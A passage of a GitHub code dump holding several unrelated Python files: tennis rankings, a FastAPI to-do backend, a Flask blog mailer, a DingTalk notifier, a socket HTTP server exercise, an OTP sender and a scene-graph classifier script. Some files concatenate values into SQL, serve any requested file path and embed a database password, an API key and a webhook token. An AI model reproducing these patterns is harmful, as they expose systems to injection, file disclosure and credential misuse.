\"in the period 2007-2021, with\", winner[1], \"games won.\")\n\n elif ranking_function == winners_dont_lose_ranking:\n for winner in ranking_function(matches, year)[:top_n_players]:\n if year != None:\n print(\"According to the winners don't lose ranking,\",\n 
winner[0], \"was the player ranked\", winner[2],\n \"in\", year, \"with a score of\", str(winner[1]) + \".\")\n else:\n print(\"According to the winners don't lose ranking,\",\n winner[0], \"was the player ranked\", winner[2],\n \"in the period 2007-2021, with a score of\", str(winner[1]) + \".\")\n\n elif ranking_function == wbw_ranking:\n for winner in ranking_function(matches, year = year, epsilon = epsilon,\n max_iterations = max_iterations)[0][:top_n_players]:\n if year != None:\n print(\"According to the WbW ranking,\",\n winner[0], \"was the player ranked\", winner[2],\n \"in\", year, \"with a score of\", str(winner[1]) + \".\")\n else:\n print(\"According to the WbW ranking,\",\n winner[0], \"was the player ranked\", winner[2],\n \"in the period 2007-2021, with a score of\", str(winner[1]) + \".\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alberto-agudo/WTA_tennis_software","sub_path":"rankings.py","file_name":"rankings.py","file_ext":"py","file_size_in_byte":19598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29922385067","text":"\ndef ascending(txt):\n factors = lambda x: [f for f in range(1,x) if not x%f]\n for i in factors(len(txt)):\n nums = [int(txt[s:s+i]) for s in range(0,len(txt),i)]\n print(sum(range(1,len(nums))))\n if sum(range(1,len(nums)))==(sum(nums) - (nums[0]*len(nums))):\n return True\n print(nums)\n return False\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"9iLhKgqZn5exBrmWm_12.py","file_name":"9iLhKgqZn5exBrmWm_12.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2306202252","text":"from setuptools import setup, find_packages\n\nimport quango.version\n\nscripts = ['bin/quango']\n\nsetup(\n name = 'quango',\n version = quango.version.get_version(),\n license = 'GPL',\n author = 'Georg Brandl',\n author_email = 'g.brandl@fz-juelich.de',\n description = 'Nice generic user interface for Tango devices',\n packages = find_packages(),\n package_data = {'quango': ['RELEASE-VERSION']},\n scripts = scripts,\n classifiers = [\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'Natural Language :: English',\n 'License :: OSI Approved :: GPL License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Scientific/Engineering :: Human Machine Interfaces',\n 'Topic :: Scientific/Engineering :: Physics',\n ],\n)\n","repo_name":"alenz33/quango","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37269455637","text":"from fastapi import FastAPI\nfrom fastapi.responses import JSONResponse\nimport pyodbc\nimport json\nfrom typing import List\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom pydantic import BaseModel\n\napp = FastAPI()\n\norigins = [\n \"*\"\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\nclass INotes(BaseModel):\n id: int\n noteName: str\n todos: list\n dateCreated: str\n lastUpdated: str\n openList: bool = True\n\n\ncnn = pyodbc.connect(\n 'DRIVER = 
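The `wbw_ranking` record above is a damped fixed-point iteration over a "lost-to" graph, i.e. PageRank with damping factor 0.85. A toy run of the same update rule on an invented loss matrix (illustrative only):

    import numpy as np

    # L[i][j] = times player i lost to player j (invented toy data; player 2 is undefeated)
    L = np.array([[0, 2, 0],
                  [0, 0, 1],
                  [0, 0, 0]])
    n = L.shape[0]
    score = np.full(n, 1.0 / n)
    losses = L.sum(axis=1)
    for _ in range(100):
        # losers split their score among the players who beat them;
        # players with no losses keep their own score (the ZeroDivisionError branch)
        share = np.divide(score, losses, out=np.zeros(n), where=losses > 0)
        new = share @ L + np.where(losses == 0, score, 0.0)
        score = 0.85 * new + 0.15 / n  # same damping as the record
    print(score)  # higher score = beaten less often, by stronger opponents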
{SQL Server};DSN=DSQL;SERVER=DESKTOP-TS5ILJ2\\\\SQLEXPRESS;DATABASE=Todolist;UID=dorJob;PWD=1234;')\ncursor = cnn.cursor()\n\n\n@app.get(\"/note\")\ndef ReadData():\n jsonFinished = []\n jsonFile = {}\n todosList = []\n notesList = []\n cursor.execute('SELECT id FROM Todolist.dbo.INotes')\n for rows in cursor:\n notesList.append(rows)\n for note in notesList:\n cursor.execute(\n 'SELECT * FROM Todolist.dbo.ITodo WHERE todoId=any(SELECT idTodo FROM Todolist.dbo.NoteTodo where idNote=' + str(note.id) + ')')\n for row in cursor:\n todo = {}\n if (row.completed == 1):\n flag = True\n else:\n flag = False\n todo = {\n \"todoId\": int(row.todoId),\n \"title\": str(row.title),\n \"completed\": bool(flag)}\n todosList.append(todo)\n cursor.execute(\n 'SELECT * FROM Todolist.dbo.INotes WHERE id = ?', str(note.id))\n nt = cursor.fetchone()\n if (nt.openList == 1):\n flag = True\n else:\n flag = False\n jsonFile = {\n \"id\": int(nt.id),\n \"noteName\": str(nt.noteName),\n \"todos\": todosList,\n \"dateCreated\": nt.dateCreated,\n \"lastUpdated\": nt.lastUpdated,\n \"openList\": bool(flag)}\n jsonFinished.append(jsonFile)\n todosList = []\n ToServer = json.dumps(jsonFinished)\n return JSONResponse(content=ToServer)\n\n\n@app.post(\"/note\")\nasync def create_Note(note: INotes):\n cursor.execute(\n \"INSERT INTO Todolist.dbo.INotes( noteName, dateCreated, lastUpdated, openList) VALUES (?,?,?,?)\", note.noteName, note.dateCreated, note.lastUpdated, note.openList)\n cnn.commit()\n\n\n@app.delete(\"/note/{id}\")\nasync def DeleteNoteFromDataBase(id: int):\n print(\"dcdc\")\n cursor.execute(\n \"SELECT idTodo FROM Todolist.dbo.NoteTodo WHERE idNote =?\", id)\n todoIds = cursor.fetchall()\n cursor.execute(\n \"DELETE FROM Todolist.dbo.NoteTodo WHERE idNote=?\", id)\n cnn.commit()\n for x in todoIds:\n cursor.execute(\n \"DELETE FROM Todolist.dbo.ITodo WHERE todoId=?\", x.idTodo)\n cnn.commit()\n cursor.execute(\"DELETE FROM Todolist.dbo.INotes WHERE id=?\", id)\n cnn.commit()\n print(cursor)\n\n\n@app.post(\"/note/addNote\")\nasync def updateDataBase(note: INotes):\n print(\"updateDataBase\")\n todos = note.todos\n cursor.execute(\n \"INSERT INTO Todolist.dbo.ITodo(title,completed) VALUES (?,?)\", todos[-1][\"title\"], todos[-1][\"completed\"])\n cnn.commit()\n cursor.execute(\n \"SELECT Max(todoId) FROM Todolist.dbo.ITodo\")\n max_id = cursor.fetchone()[0]\n print(max_id)\n print(note.id)\n cursor.execute(\n \"INSERT INTO Todolist.dbo.NoteTodo(idNote,idTodo) VALUES (?,?)\", note.id, max_id)\n cnn.commit()\n\n\n@app.post(\"/note/update\")\nasync def updateComp(note: INotes):\n print('INSIDE updateComp')\n todos = note.todos\n if (todos[-1][\"completed\"]):\n flag = 0\n else:\n flag = 1\n cursor.execute(\"UPDATE Todolist.dbo.ITodo SET completed =\" +\n str(flag) + \" WHERE todoId = \" + str(todos[-1][\"todoId\"]))\n cnn.commit()\n\n\n@app.post(\"/note/updateNote\")\nasync def updateOpenList(note: INotes):\n if (note.openList):\n flag = 0\n else:\n flag = 1\n cursor.execute(\"UPDATE Todolist.dbo.INotes SET openList =\" +\n str(flag)+\" WHERE id = \"+str(note.id))\n cnn.commit()\n","repo_name":"dorhaba/Todolist_pyhton","sub_path":"Todolist/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21589214296","text":"from flask import Flask, render_template, request\nimport requests\nimport smtplib\nfrom datetime import date\n\nnpoint_url = 
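One remark on the Todolist record above: some UPDATE statements are built by string concatenation while others already use pyodbc `?` placeholders. A sketch of the concatenated ones rewritten in parameterized form (function name invented; table and column names taken from the record):

    def set_todo_completed(cnn, todo_id, completed):
        # '?' placeholders let the driver handle quoting and types
        cursor = cnn.cursor()
        cursor.execute(
            "UPDATE Todolist.dbo.ITodo SET completed = ? WHERE todoId = ?",
            int(completed), todo_id,
        )
        cnn.commit()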
'https://api.npoint.io/a695600da11dfa61ec4f'\nOWN_EMAIL = 'YOUR EMAIL'\nOWN_PASSWORD = 'YOUR PASSWORD'\nposts = requests.get(npoint_url).json()\napp = Flask(__name__)\n\n\n@app.route('/')\n@app.route('/index.html')\ndef get_all_posts():\n    \"\"\"Landing Page.\"\"\"\n    return render_template('index.html', all_posts=posts, year=year, month=month)\n\n\n@app.route('/post/<int:index>')\ndef show_post(index):\n    requested_post = None\n    for blog_post in posts:\n        if blog_post['id'] == index:\n            requested_post = blog_post\n    return render_template('post.html', post=requested_post, year=year)\n\n\n@app.route('/about')\ndef about():\n    \"\"\"About Page.\"\"\"\n    return render_template('about.html', year=year)\n\n\n@app.route('/contact', methods=['GET', 'POST'])\ndef contact():\n    \"\"\"Contact Page.\"\"\"\n    if request.method == 'POST':\n        data = request.form\n        send_email(data[\"name\"], data[\"email\"], data[\"phone\"], data[\"message\"])\n        return render_template('contact.html', year=year, msg_sent=True)\n    return render_template('contact.html', year=year, msg_sent=False)\n\n\n@app.route('/post')\ndef post():\n    \"\"\"Post Page\"\"\"\n    return render_template('post.html')\n\n\ndef send_email(name, email, phone, message):\n    # if you get UnicodeEncodeError\n    # try {message}\".encode(\"utf-8\")\n    email_message = f\"Subject:New Message\\n\\nName: {name}\\nEmail: {email}\\nPhone: {phone}\\nMessage:{message}\"\n    with smtplib.SMTP('smtp.gmail.com') as connection:\n        connection.starttls()\n        connection.login(OWN_EMAIL, OWN_PASSWORD)\n        connection.sendmail(OWN_EMAIL, OWN_EMAIL, email_message)\n\n\nif __name__ == '__main__':\n    today = date.today()\n    year = today.year\n    month = today.month\n    app.run(debug=True)\n","repo_name":"ChaosFreeze/upgraded-blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38074782458","text":"from __future__ import annotations\nfrom src.helpers.selectors.dict_selector import DictSelector\nfrom src.facades.config.config_reader import ConfigReader\nfrom src.generators.image_generator import ImageGenerator\nfrom src.generators.sound_generator import SoundGenerator\nfrom src.generators.number_generator import NumberGenerator\nfrom src.generators.clip_generator import ClipGenerator\nfrom libs.python_library.argument_parser import ArgumentParser\n\n\nclass AppDelegator:\n    def __init__(self) -> None:\n        pass\n\n    def apply_config(self) -> AppDelegator:\n        for key, value in ConfigReader.read().items():\n            setattr(self, f'_{key}', value)\n            print('[%s]: %s' % (key, value))\n        self._img_config = ConfigReader.read(path=self._img_config_path)\n        self._sound_config = ConfigReader.read(path=self._sound_config_path)\n        return self\n    \n    def apply_arguments(self) -> AppDelegator:\n        for key, value in ArgumentParser.get_pairs(remove_prefix=True).items():\n            setattr(self, f'_{key}', int(value))\n            print('[%s]: %s' % (key, value))\n        return self\n\n    def generate_pairs(self) -> AppDelegator:\n        print('In generate_pairs')\n        self.imgs = {}\n        while(len(self.imgs) < self._img_cnt):\n            self.imgs[NumberGenerator(\n                config=self._img_config,\n                folder=self._img_folder,\n                basis=self._max_imgs,\n                file_type=self._img_type\n            ).generate().condition_correcting().output()] = len(self.imgs)\n        print('going for sound')\n        self.sounds = {}\n        while(len(self.sounds) < self._img_cnt):\n            self.sounds[NumberGenerator(\n                config=self._sound_config,\n                folder=self._sound_folder,\n                basis=self._max_imgs,\n                
file_type=self._sound_type\n ).generate().condition_correcting().output()] = len(self.sounds)\n return self\n\n def generate_pictures(self) -> AppDelegator:\n print('In generate_pictures')\n for img_code, index in self.imgs.items():\n print(f'image #{index} = {img_code}')\n ImageGenerator(\n config=self._img_config,\n folder=self._img_folder,\n basis=self._max_imgs,\n file_type=self._img_type\n ) \\\n .decode(img_code) \\\n .generate() \\\n .save(path=self._output_path['imgs'])\n print(f'done for image #{index}')\n return self\n\n def generate_sounds(self) -> AppDelegator:\n print('In generate_sounds')\n for sound_code, index in self.sounds.items():\n print(f'sound #{index} = {sound_code}')\n SoundGenerator(\n config=self._sound_config,\n folder=self._sound_folder,\n basis=self._max_imgs,\n file_type=self._sound_type\n ) \\\n .decode(sound_code) \\\n .generate() \\\n .mastering() \\\n .save(path=self._output_path['sounds'])\n print(f'done music for #{index}')\n return self\n \n def mix(self) -> AppDelegator:\n for i in range(self._img_cnt):\n ClipGenerator(\n sound_id=DictSelector.get_by_value(self.sounds, i)[0],\n img_id=DictSelector.get_by_value(self.imgs, i)[0]\n ) \\\n .load_img(path=self._output_path['imgs'], file_type=self._img_type) \\\n .load_sound(path=self._output_path['sounds'], file_type=self._sound_type) \\\n .generate() \\\n .save(path=self._output_path['mp4s'])\n return self\n","repo_name":"shamir0xe/xellu","sub_path":"src/delegators/app_delegator.py","file_name":"app_delegator.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"73640633050","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#########################################################################\n# Author: Zhaoting Weng\n# Created Time: Sun 18 Oct 2015 06:39:23 PM CST\n# File Name: systemd_filter.py\n# Description:\n#########################################################################\n\nimport argparse\nimport sys\nimport os\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\n\nfrom lib.dot_filter import dot_filter\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"input\")\nparser.add_argument(\"--from-node\", dest=\"fromNode\", default=\"\", help='From which node to extract(regexp supported)')\nparser.add_argument(\"--to-node\", dest=\"toNode\", default=\"\", help='To which node to extract(regexp supported)')\nparser.add_argument(\"--filter\", dest=\"filter\", nargs=\"*\", choices=[\"conflicts\", \"after\", \"wants\", \"requires\", \"requisite\"], help='Which kind of transitions do you want to view')\nparser.add_argument(\"--output\", \"-o\", dest=\"output\", default=\"./output.dot\", help='Output filtered dot file')\nArgs = parser.parse_args()\n\ndot = dot_filter(\"systemd\")\ndot.filt(Args.input, Args.fromNode, Args.toNode, Args.filter, Args.output)\n\n","repo_name":"magodo/DotFilter","sub_path":"bin/systemd_filter.py","file_name":"systemd_filter.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36942297933","text":"from django.conf import settings\nimport http.client,requests,random\n\n\ndef phone_otp(phone_number,otp):\n try:\n url = f'https://2factor.in/API/V1/e2496452-1a3b-11ee-addf-0200cd936042/SMS/+91{phone_number}/{otp}/OTP1'\n response = requests.get(url)\n \n except Exception as e:\n return 
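The `apply_config`/`apply_arguments` methods in the AppDelegator record above share one idiom: every key of a mapping becomes a private attribute via `setattr`, and `self` is returned so calls can be chained. A self-contained miniature of that pattern (class name and keys invented):

    class Configurable:
        def apply(self, mapping):
            for key, value in mapping.items():
                setattr(self, f"_{key}", value)  # each key becomes self._<key>
            return self  # returning self enables .apply(...).apply(...) chains

    c = Configurable().apply({"img_cnt": 3, "max_imgs": 10})
    print(c._img_cnt, c._max_imgs)  # -> 3 10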
None","repo_name":"deepak982/Like-Dislike","sub_path":"mainapp/otp.py","file_name":"otp.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71007050013","text":"# import socket module\nfrom socket import *\nimport datetime\n\nserverSocket = socket(AF_INET, SOCK_STREAM)\n# Prepare a server socket\naddress = ('', 6789)\nserverSocket.bind(address)\nserverSocket.listen(5)\n\nwhile True:\n    # Establish the connection\n    print('Ready to serve...')\n    connectionSocket, addr = serverSocket.accept()\n    print('addr:', addr)\n    try:\n        message = connectionSocket.recv(1024).decode()\n        print('message:', message)\n        filename = message.split()[1]\n        f = open(filename[1:])\n        output_data = f.read()\n        # print('output_data:', output_data)\n        # Send one HTTP header line into socket\n        now = datetime.datetime.now()\n        first_header = \"HTTP/1.1 200 OK\"\n        header_info = {\n            \"Date\": now.strftime(\"%Y-%m-%d %H:%M\"),\n            \"Content-Length\": len(output_data),\n            \"Keep-Alive\": \"timeout=%d,max=%d\" % (10, 100),\n            \"Connection\": \"Keep-Alive\",\n            \"Content-Type\": \"text/html\"\n        }\n        following_header = \"\\r\\n\".join(\"%s:%s\" % (item, header_info[item])\n                                       for item in header_info)\n        # print(\"following_header:\", following_header)\n        connectionSocket.send(\"%s\\r\\n%s\\r\\n\\r\\n\".encode() % (first_header.encode(),\n                                                          following_header.encode()))\n        # Send the content of the requested file to the client\n        for i in range(0, len(output_data)):\n            connectionSocket.send(output_data[i].encode())\n        connectionSocket.send(\"\\r\\n\".encode())\n\n        connectionSocket.close()\n    except IOError:\n        # Send response message for file not found\n        # Close client socket\n        connectionSocket.send(\"HTTP/1.1 404 Not Found\\r\\nContent-Type: \"\n                              \"text/html\\r\\n\\r\\n
<html><body><h1>404 Not \"\n                              \"Found</h1></body></html>
\".encode())\n connectionSocket.close()\n\nserverSocket.close()\n# sys.exit() # Terminate the program after sending the corresponding data\n","repo_name":"Index-Out-Of-Range/ComputerNet","sub_path":"dp1/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12970804000","text":"# coding:utf-8\nimport json\nimport requests\n\n\ndef new_req(url, text, title,):\n data = {'msgtype': 'markdown',\n 'markdown': {\n 'text': text,\n 'title': title,\n # 'messageUrl': messageurl\n }}\n data = json.dumps(data).encode(encoding='UTF8')\n print(data)\n head = {\"Content-Type\": \"application/json\"}\n response = requests.post(url, data=data, headers=head).json\n print(response)\n\n\n# 钉钉机器人链接\n# url = \"https://oapi.dingtalk.com/robot/send?access_token=4c3fe1a2d54d0c51c8d6867c6104cc0e095113f48667e15012b8545043942b49\"\n# waring_text = \"### 请查看接口测试报告\"\n# new_req(url, waring_text, \"接口预警\")\n","repo_name":"willcyc/test_coding","sub_path":"test_coding/common_file/sendDD.py","file_name":"sendDD.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20711289753","text":"import torch\nfrom maskrcnn_benchmark.modeling.utils import cat\nimport numpy as np\nfrom torch import nn\n\nimport argparse\nimport os\nimport time\nimport datetime\nimport pickle\n\nfrom maskrcnn_benchmark.data import make_data_loader\nfrom maskrcnn_benchmark.data.build import make_data_sampler, make_batch_data_sampler\nfrom maskrcnn_benchmark.config import cfg\nfrom maskrcnn_benchmark.utils.miscellaneous import mkdir, save_config\nfrom maskrcnn_benchmark.utils.logger import setup_logger, debug_print\nfrom maskrcnn_benchmark.utils.comm import synchronize, get_rank, all_gather, is_main_process\nfrom maskrcnn_benchmark.solver import make_optimizer\nfrom maskrcnn_benchmark.solver import make_lr_scheduler\nfrom maskrcnn_benchmark.utils.metric_logger import MetricLogger\nfrom maskrcnn_benchmark.utils.checkpoint import clip_grad_norm\nfrom maskrcnn_benchmark.utils.checkpoint import DetectronCheckpointer\nfrom maskrcnn_benchmark.modeling.detector import build_detection_model\nfrom maskrcnn_benchmark.modeling.roi_heads.relation_head.utils_relation import layer_init\nfrom maskrcnn_benchmark.engine.inference import inference\nfrom maskrcnn_benchmark.HTCL.htcl_feats_dataset import HTCL_Feats_Dataset\nfrom maskrcnn_benchmark.engine.trainer import reduce_loss_dict\nfrom maskrcnn_benchmark.solver.lr_scheduler import WarmupMultiStepLR, WarmupReduceLROnPlateau\n# See if we can use apex.DistributedDataParallel instead of the torch default,\n# and enable mixed-precision via apex.amp\n# try:\n# from apex import amp\n# except ImportError:\n# raise ImportError('Use APEX for multi-precision via apex.amp')\n\n\nclass Classifier(nn.Module):\n def __init__(self, config):\n super(Classifier, self).__init__()\n self.num_rel_cls = config.MODEL.ROI_RELATION_HEAD.NUM_CLASSES\n self.LAST_FEATS_DIM = config.MODEL.ROI_RELATION_HEAD.LAST_FEATS_DIM\n self.cfg = config\n self.sigmoid = nn.Sigmoid()\n self.fine_cls = nn.Linear(self.LAST_FEATS_DIM, self.num_rel_cls)\n layer_init(self.fine_cls, xavier=True)\n\n def forward(self, feats, rel_dist0=None, logit_wt=None):\n if self.cfg.MODEL.ft_with_dist0:\n refine_dist = self.fine_cls(feats)\n refine_dist = (refine_dist - refine_dist.mean(dim=1).reshape(-1, 1)) / refine_dist.std(dim=1).reshape(-1, 1)\n 
rel_dist = rel_dist0 * self.sigmoid(logit_wt) + refine_dist * (1 - self.sigmoid(logit_wt))\n return rel_dist\n else:\n refine_dist = self.fine_cls(feats)\n refine_dist = (refine_dist - refine_dist.mean(dim=1).reshape(-1, 1)) / refine_dist.std(dim=1).reshape(-1, 1)\n return refine_dist\n\n\ndef make_classifier_data_loader(cfg, dataset=None, batch_size=None, shuffle=True, start_iter=0, is_distributed=False):\n images_per_gpu = batch_size\n num_iters = cfg.SOLVER.Classifier_max_iter\n sampler = make_data_sampler(dataset, shuffle, is_distributed)\n batch_sampler = make_batch_data_sampler(\n dataset, sampler, False, images_per_gpu, num_iters, start_iter\n )\n\n num_workers = cfg.DATALOADER.NUM_WORKERS\n data_loader = torch.utils.data.DataLoader(\n dataset,\n num_workers=num_workers,\n batch_sampler=batch_sampler,\n )\n return data_loader\n\n\ndef sgg_model_load_parameterss(model, classifier, distributed):\n if distributed:\n classifier = classifier.module\n with torch.no_grad():\n model.roi_heads.relation.predictor.fine_cls.weight.copy_(classifier.fine_cls.weight, non_blocking=True)\n model.roi_heads.relation.predictor.fine_cls.bias.copy_(classifier.fine_cls.bias, non_blocking=True)\n return model\n\n\ndef fix_eval_modules(eval_modules):\n for module in eval_modules:\n for _, param in module.named_parameters():\n param.requires_grad = False\n\n\ndef run_val(cfg, model, val_data_loaders, distributed, logger):\n iou_types = (\"bbox\",)\n if cfg.MODEL.MASK_ON:\n iou_types = iou_types + (\"segm\",)\n if cfg.MODEL.KEYPOINT_ON:\n iou_types = iou_types + (\"keypoints\",)\n if cfg.MODEL.RELATION_ON:\n iou_types = iou_types + (\"relations\",)\n if cfg.MODEL.ATTRIBUTE_ON:\n iou_types = iou_types + (\"attributes\",)\n\n\n dataset_names = cfg.DATASETS.VAL\n val_result = []\n for dataset_name, val_data_loader in zip(dataset_names, val_data_loaders):\n dataset_result = inference(\n cfg,\n model,\n val_data_loader,\n dataset_name=dataset_name,\n iou_types=iou_types,\n box_only=False if cfg.MODEL.RETINANET_ON else cfg.MODEL.RPN_ONLY,\n device=cfg.MODEL.DEVICE,\n expected_results=cfg.TEST.EXPECTED_RESULTS,\n expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,\n output_folder=None,\n logger=logger,\n )\n synchronize()\n val_result.append(dataset_result)\n # support for multi gpu distributed testing\n gathered_result = all_gather(torch.tensor(dataset_result).cpu())\n gathered_result = [t.view(-1) for t in gathered_result]\n gathered_result = torch.cat(gathered_result, dim=-1).view(-1)\n valid_result = gathered_result[gathered_result >= 0]\n val_result = float(valid_result.mean())\n del gathered_result, valid_result\n # torch.cuda.empty_cache()\n return val_result\n\n\ndef run_test(cfg, model, distributed, logger):\n iou_types = (\"bbox\",)\n if cfg.MODEL.MASK_ON:\n iou_types = iou_types + (\"segm\",)\n if cfg.MODEL.KEYPOINT_ON:\n iou_types = iou_types + (\"keypoints\",)\n if cfg.MODEL.RELATION_ON:\n iou_types = iou_types + (\"relations\",)\n if cfg.MODEL.ATTRIBUTE_ON:\n iou_types = iou_types + (\"attributes\",)\n output_folders = [None] * len(cfg.DATASETS.TEST)\n\n dataset_names = cfg.DATASETS.TEST\n if cfg.CLASSIFIER_OUTPUT_DIR:\n for idx, dataset_name in enumerate(dataset_names):\n output_folder = os.path.join(cfg.CLASSIFIER_OUTPUT_DIR, \"inference\", dataset_name)\n mkdir(output_folder)\n output_folders[idx] = output_folder\n data_loaders_val = make_data_loader(cfg, mode='test', is_distributed=distributed)\n for output_folder, dataset_name, data_loader_val in zip(output_folders, dataset_names, 
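`Classifier.forward` in the HTCL record above standardizes the refined logits per row, then takes a convex combination with the original distribution, gated by a learned parameter squashed through a sigmoid. The arithmetic as a standalone sketch (the shapes and the scalar gate are assumptions):

    import torch

    refine = torch.randn(4, 51)      # [num_pairs, num_rel_cls], invented shapes
    rel_dist0 = torch.randn(4, 51)
    logit_wt = torch.tensor(0.0)     # learned gate; assumed scalar here
    refine = (refine - refine.mean(dim=1, keepdim=True)) / refine.std(dim=1, keepdim=True)
    g = torch.sigmoid(logit_wt)      # g lies in (0, 1)
    rel_dist = rel_dist0 * g + refine * (1 - g)  # convex blend of the two heads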
data_loaders_val):\n inference(\n cfg,\n model,\n data_loader_val,\n dataset_name=dataset_name,\n iou_types=iou_types,\n box_only=False if cfg.MODEL.RETINANET_ON else cfg.MODEL.RPN_ONLY,\n device=cfg.MODEL.DEVICE,\n expected_results=cfg.TEST.EXPECTED_RESULTS,\n expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,\n output_folder=output_folder,\n logger=logger,\n )\n synchronize()\n\n\n\ndef htcl_classifier_ft(cfg, local_rank, distributed, logger):\n debug_print(logger, 'prepare training')\n classifier = Classifier(cfg)\n debug_print(logger, 'end model construction')\n device = torch.device(cfg.MODEL.DEVICE)\n classifier.to(device)\n\n num_batch = cfg.SOLVER.Classifier_batch\n cls_optimizer = make_optimizer(cfg, classifier, logger, slow_heads=[], slow_ratio=10.0,\n rl_factor=float(num_batch))\n scheduler = WarmupMultiStepLR(cls_optimizer, cfg.SOLVER.cls_ft_STEPS, 0.1, warmup_factor=0.01, warmup_iters=2000)\n debug_print(logger, 'end optimizer and shcedule')\n\n # Initialize mixed-precision training\n # use_mixed_precision = cfg.DTYPE == \"float16\"\n # amp_opt_level = 'O1' if use_mixed_precision else 'O0'\n # classifier, cls_optimizer = amp.initialize(classifier, cls_optimizer, opt_level= amp_opt_level,verbosity=0)\n\n if distributed:\n classifier = torch.nn.parallel.DistributedDataParallel(\n classifier, device_ids=[local_rank], output_device=local_rank,\n # this should be removed if we update BatchNorm stats\n broadcast_buffers=False,\n find_unused_parameters=True,\n )\n debug_print(logger, 'end distributed')\n\n arguments = {}\n arguments[\"iteration\"] = 0\n arguments[\"last_val_results\"] = 0\n arguments[\"best_val_results\"] = 0\n\n output_dir = cfg.CLASSIFIER_OUTPUT_DIR\n save_to_disk = get_rank() == 0\n\n checkpointer = DetectronCheckpointer(cfg, classifier, cls_optimizer,scheduler, save_dir= output_dir, save_to_disk= save_to_disk,logger=logger, custom_scheduler=True)\n\n if checkpointer.has_checkpoint():\n extra_checkpoint_data = checkpointer.load()\n arguments.update(extra_checkpoint_data)\n else:\n load_mapping = {\"fine_cls\": \"roi_heads.relation.predictor.fine_cls\"}\n checkpointer.load(cfg.MODEL.Feature_Generation_MODEL, with_optim=False, load_mapping=load_mapping)\n\n sgg_model = build_detection_model(cfg)\n eval_modules = (sgg_model.rpn, sgg_model.backbone, sgg_model.roi_heads,)\n fix_eval_modules(eval_modules)\n sgg_model.to(device)\n\n # use_mixed_precision = cfg.DTYPE == \"float16\"\n # amp_opt_level = 'O1' if use_mixed_precision else 'O0'\n # sgg_model = amp.initialize(sgg_model, opt_level=amp_opt_level)\n\n checkpointer_sgg = DetectronCheckpointer(cfg, sgg_model, logger=logger)\n checkpointer_sgg.load(cfg.MODEL.Feature_Generation_MODEL, with_optim=False)\n\n sgg_model = sgg_model_load_parameterss(sgg_model, classifier, distributed)\n\n # # # # # # # # # # # # # # #\n if cfg.MODEL.ft_with_dist0:\n logit_wt = sgg_model.roi_heads.relation.predictor.logit_wt\n\n data_set = HTCL_Feats_Dataset(cfg, logger)\n train_data_loader = make_classifier_data_loader(cfg, dataset=data_set, batch_size=num_batch,\n shuffle=True, start_iter=arguments[\"iteration\"], is_distributed=distributed)\n val_data_loaders = make_data_loader(cfg, mode='val', is_distributed=distributed,)\n debug_print(logger, 'end dataloader')\n\n if cfg.SOLVER.PRE_VAL:\n logger.info(\"Validate before training\")\n run_val(cfg, sgg_model, val_data_loaders, distributed, logger)\n\n logger.info(\"Start training\")\n ce_loss = nn.CrossEntropyLoss()\n meters = MetricLogger(delimiter=\" \")\n max_iter = 
len(train_data_loader)\n start_iter = arguments[\"iteration\"]\n\n start_training_time = time.time()\n end = time.time()\n print_first_grad = True\n\n for iteration, batch in enumerate(train_data_loader, start_iter):\n data_time = time.time() - end\n iteration = iteration + 1\n arguments[\"iteration\"] = iteration\n classifier.train()\n\n if cfg.MODEL.ft_with_dist0:\n feats, rels, rel_dist0 = batch\n rel_dist0 = rel_dist0.to(device)\n feats = feats.to(device)\n rels = rels.to(device)\n rel_dist = classifier(feats, rel_dist0, logit_wt)\n else:\n feats, rels = batch\n feats = feats.to(device)\n rels = rels.to(device)\n rel_dist = classifier(feats)\n loss_ce = ce_loss(rel_dist.float(), rels.long())\n loss_relation = dict(loss_ce=loss_ce)\n\n losses = sum(loss for loss in loss_relation.values())\n # reduce losses over all GPUs for logging purposes\n loss_dict_reduced = reduce_loss_dict(loss_relation)\n losses_reduced = sum(loss for loss in loss_dict_reduced.values())\n\n meters.update(loss=losses_reduced, **loss_dict_reduced)\n cls_optimizer.zero_grad()\n\n # Note: If mixed precision is not used, this ends up doing nothing\n # Otherwise apply loss scaling for mixed-precision recipe\n # 